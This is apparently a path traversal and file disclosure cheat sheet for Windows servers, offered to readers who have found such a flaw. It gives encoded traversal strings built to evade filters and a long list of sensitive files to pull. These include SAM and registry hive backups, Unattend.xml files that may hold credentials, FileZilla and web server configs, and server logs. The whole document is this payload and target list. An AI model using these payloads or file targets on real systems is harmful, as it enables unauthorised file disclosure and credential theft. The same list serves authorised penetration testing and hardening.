Got a path/directory traversal or file disclosure vulnerability on a Windows-server and need to know some interesting files to hunt for? I’ve got you covered Know any more good files to look for? Let me know! Are you on a Linux server? Try this one instead: Path Traversal Cheat Sheet: Linux
The list included below contains absolute file paths, remember if you have a traversal attack you can prefix these with encoding traversal strings, like these:
../ ..\ ..\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ....\
File Disclosure Cheat Sheet
C:/Users/Administrator/NTUser.dat C:/Documents and Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log C:/Program Files/Apache Group/Apache/logs/error.log C:/Program Files/FileZilla Server/FileZilla Server.xml C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log